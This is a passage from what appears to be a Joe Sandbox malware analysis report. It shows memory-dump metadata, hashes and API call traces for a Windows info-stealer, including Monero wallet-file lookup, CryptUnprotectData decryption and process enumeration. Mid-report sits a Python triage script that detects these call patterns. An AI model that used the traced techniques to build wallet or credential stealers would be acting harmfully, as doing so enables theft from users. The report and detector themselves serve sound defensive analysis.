                                     • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &;;^$Jg2$rw{$}[Q
                                    • API String ID: 0-4121264173
                                    • Opcode ID: 20ad46fecd682ecb21a678baf0c03bcd3e56eff1fb2db47556aa75bb67be47c1
                                    • Instruction ID: c9e33e0ce2aa1643eca7df283e29cd2633e63cde7ac038978f18620eaa9833e2
                                    • Opcode Fuzzy Hash: 20ad46fecd682ecb21a678baf0c03bcd3e56eff1fb2db47556aa75bb67be47c1
                                    • Instruction Fuzzy Hash: F4B215F36082009FE704AE2DEC8567AFBE9EF94320F1A493DE6C4C7744E67598058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                     • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: N\w_$W9=$ah^{$p^|?
                                    • API String ID: 0-963267157
                                    • Opcode ID: 6cf89d782fbbc8d95ba9b65d94f5fc48b1647fd9d9c5e551ba69895f973bdb1b
                                    • Instruction ID: 0c99ae31b4e14446caa7f69cfc8dbc84ec36ac1e0d34e310c7a36cbf810ab0a3
                                    • Opcode Fuzzy Hash: 6cf89d782fbbc8d95ba9b65d94f5fc48b1647fd9d9c5e551ba69895f973bdb1b
                                    • Instruction Fuzzy Hash: 6CB2C6F360C200AFE704AE1DEC8567ABBE5EF94720F1A493DEAC5C3744E63558148697
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C505B7), ref: 00C486CA
                                    • Process32First.KERNEL32(?,00000128), ref: 00C486DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 00C486F3
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • CloseHandle.KERNEL32(?), ref: 00C48761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                     • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 691856492f2f9075f8944520bed7a733ef792e2eb2a7b19e7d85a605ce5aed26
                                    • Instruction ID: f285f9a0773b6932cc473a99fc1b3f5c4a7ec5d52a59d768def4321ab737bbf7
                                    • Opcode Fuzzy Hash: 691856492f2f9075f8944520bed7a733ef792e2eb2a7b19e7d85a605ce5aed26
                                    • Instruction Fuzzy Hash: AD314B71941218ABDB24EF55DC55FEEB778FB45700F1041A9F50AA21A0DB306A89CFA2
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00C35184,40000001,00000000,00000000,?,00C35184), ref: 00C48EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                     • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: a88f35e6e0106c877b1378969527d7dae8f8a0e4b9e13b7ce99ef4b875ceb554
                                    • Instruction ID: 8760ac708f2ddf2c82227d93d8de90e33693bee95a0e885efb14d9215bd4b0f7
                                    • Opcode Fuzzy Hash: a88f35e6e0106c877b1378969527d7dae8f8a0e4b9e13b7ce99ef4b875ceb554
                                    • Instruction Fuzzy Hash: E5111C74200204BFDB04CFA5D884FAF33A9BF89700F149458F9198B250DB75ED89DB61
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                     • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: c1f169ab701c72cdcb8a2e00601244d2838eb2e2e0c37a03db03dfd5e7b25855
                                    • Instruction ID: ac751f89cd04d213f82487a2b4db917d3cccc3f7119eb643b78c7756c37f8636
                                    • Opcode Fuzzy Hash: c1f169ab701c72cdcb8a2e00601244d2838eb2e2e0c37a03db03dfd5e7b25855
                                    • Instruction Fuzzy Hash: 6811A4B4240208EFEB14CF64DC95FAAB7B5FB89704F248058F9199B390C7B5AA41CB51
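The two "APIs" entries above (the CreateToolhelp32Snapshot / Process32First / Process32Next / CloseHandle walk at 00C486CA..00C48761, and the CryptStringToBinaryA / LocalAlloc / CryptStringToBinaryA / LocalFree sequence at 00C39AEF..00C39B3F) are the kind of trace a triage script can recognise mechanically. The following is an added example, not Joe Sandbox code and not part of this report: it parses trace lines in the report's "Name.MODULE(args), ref: ADDR" form, names the literal argument values from their Win32 SDK meanings (TH32CS_SNAPPROCESS == 2; 0x128 == sizeof(PROCESSENTRY32) for the ANSI struct on x86; CRYPT_STRING_BASE64 == 1; 0x40000001 == CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF; LocalAlloc 0x40 == LPTR), and flags the process walk and the size-query-then-decode base64 idiom. The sample trace is constructed from the entries printed above; the pattern lists and the function names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed from the "APIs" entries of this report (not captured live here).
SAMPLE_TRACE = """
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C505B7), ref: 00C486CA
Process32First.KERNEL32(?,00000128), ref: 00C486DE
Process32Next.KERNEL32(?,00000128), ref: 00C486F3
CloseHandle.KERNEL32(?), ref: 00C48761
CryptBinaryToStringA.CRYPT32(00000000,00C35184,40000001,00000000,00000000,?,00C35184), ref: 00C48EC0
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
wsprintfA.USER32 ref: 00C479F3
"""

# "Name.MODULE(arg,arg,...), ref: ADDR"; the argument list is absent for some entries.
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

Arg = Union[int, str, None]


@dataclass
class Call:
    api: str
    module: str
    args: List[Arg]   # hex literals as int, '?' as None, dereferenced strings as str
    ref: int          # call-site address


def _parse_arg(raw: str) -> Arg:
    if raw == "?":
        return None          # the sandbox could not resolve this argument
    try:
        return int(raw, 16)
    except ValueError:
        return raw           # a string the sandbox dereferenced, e.g. a file path


def parse_trace(text: str) -> List[Call]:
    calls: List[Call] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        raw_args = m["args"]
        args = [_parse_arg(a) for a in raw_args.split(",")] if raw_args else []
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


# Win32 SDK meanings for the literal arguments this sample passes (0-based position).
KNOWN_ARGS = {
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS"},
    ("Process32First", 1): {0x128: "dwSize == sizeof(PROCESSENTRY32), ANSI, x86"},
    ("Process32Next", 1): {0x128: "dwSize == sizeof(PROCESSENTRY32), ANSI, x86"},
    ("CryptBinaryToStringA", 2): {0x40000001: "CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF"},
    ("CryptStringToBinaryA", 2): {0x1: "CRYPT_STRING_BASE64"},
    ("LocalAlloc", 0): {0x40: "LPTR (LMEM_FIXED | LMEM_ZEROINIT)"},
}


def annotate(calls: List[Call]):
    """Return (ref, api, meaning) for every argument value the table can name."""
    out = []
    for c in calls:
        for (api, idx), table in KNOWN_ARGS.items():
            if c.api == api and idx < len(c.args) and c.args[idx] in table:
                out.append((c.ref, c.api, table[c.args[idx]]))
    return out


def find_sequence(calls: List[Call], pattern: List[str]) -> Optional[List[int]]:
    """Refs of the first in-order (not necessarily adjacent) match of `pattern`, else None."""
    refs, want = [], 0
    for c in calls:
        if c.api == pattern[want]:
            refs.append(c.ref)
            want += 1
            if want == len(pattern):
                return refs
    return None


# Toolhelp process enumeration, as seen in the 00C486CA..00C48761 entry.
PROCESS_WALK = ["CreateToolhelp32Snapshot", "Process32First", "Process32Next", "CloseHandle"]
# Base64 decode idiom: size query (pbBinary NULL), allocate, real decode, release.
BASE64_DECODE = ["CryptStringToBinaryA", "LocalAlloc", "CryptStringToBinaryA", "LocalFree"]


def triage(text: str) -> dict:
    calls = parse_trace(text)
    return {
        "calls": len(calls),
        "process_walk": find_sequence(calls, PROCESS_WALK),
        "base64_decode": find_sequence(calls, BASE64_DECODE),
        "annotations": annotate(calls),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_TRACE).items():
        print(key, value if not isinstance(value, list) else [
            tuple(hex(x) if isinstance(x, int) else x for x in v) if isinstance(v, tuple) else hex(v)
            for v in value])
```

The matcher is deliberately order-based rather than adjacency-based, because the report interleaves "Part of subcall function" lines (lstrcpy, lstrlen, lstrcat) between the Toolhelp calls; a detector that required adjacent calls would miss the walk shown above.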
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C50E00,00000000,?), ref: 00C479B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C479B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00C50E00,00000000,?), ref: 00C479C4
                                    • wsprintfA.USER32 ref: 00C479F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                     • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: c304e89a678d7b8c3366babedaf38b2002c8d81b0b7d43b8bf9c3a47b49bf8cd
                                    • Instruction ID: e1ad326ab419198135ed0330580746a4280350571a0e87a93e9889cd631b6514
                                    • Opcode Fuzzy Hash: c304e89a678d7b8c3366babedaf38b2002c8d81b0b7d43b8bf9c3a47b49bf8cd
                                    • Instruction Fuzzy Hash: F9112AB2904118ABCB14DFCADD45BBEB7F8FB4CB11F14425AF605A2280D3395944D7B1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,019DDF70,00000000,?,00C50E10,00000000,?,00000000,00000000), ref: 00C47A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C47A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,019DDF70,00000000,?,00C50E10,00000000,?,00000000,00000000,?), ref: 00C47A7D
                                    • wsprintfA.USER32 ref: 00C47AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                     • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 25db1f7e01b7a9f70788d7181557f72f4d1dc3826fa1e4fdb5683da452cea892
                                    • Instruction ID: 071a9c1ccec66b07f00f42669cda62c20f75f6ef02cd405cd0550bd38b76e58b
                                    • Opcode Fuzzy Hash: 25db1f7e01b7a9f70788d7181557f72f4d1dc3826fa1e4fdb5683da452cea892
                                    • Instruction Fuzzy Hash: F6118EB1A45218EFEB20DB55DC49FA9B778FB44721F1043AAE91AA32C0C7741A84CF52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                     • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :!o$I#}$f-'
                                    • API String ID: 0-3078760312
                                    • Opcode ID: 615eab73f7a79fd8254370591f1693799b6d5be31131497212bb5ab537944828
                                    • Instruction ID: 2e8c1a436f4148ecb9c44fb88770a2d2a104c961965c9d4319c92f94e4f51b96
                                    • Opcode Fuzzy Hash: 615eab73f7a79fd8254370591f1693799b6d5be31131497212bb5ab537944828
                                    • Instruction Fuzzy Hash: C7B207F36082009FE304AE6DEC8567AFBE9EF94760F1A893DE6C4C3744E63558058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: [s~|$mHw$aO
                                    • API String ID: 0-2738172619
                                    APIs
                                    • CoCreateInstance.COMBASE(00C4E118,00000000,00000001,00C4E108,00000000), ref: 00C43758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C437B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C39B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C39BA3
                                    • LocalFree.KERNEL32(?), ref: 00C39BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3;?^$4zt'
                                    • API String ID: 0-3179944323
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: E~$Ij}g$R:Y
                                    • API String ID: 0-3270868955
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: `/p7
                                    • API String ID: 0-3203527995
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C515B8,00C50D96), ref: 00C3F71E
                                    • StrCmpCA.SHLWAPI(?,00C515BC), ref: 00C3F76F
                                    • StrCmpCA.SHLWAPI(?,00C515C0), ref: 00C3F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 00C3FAC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    Strings
                                    Memory Dump Source
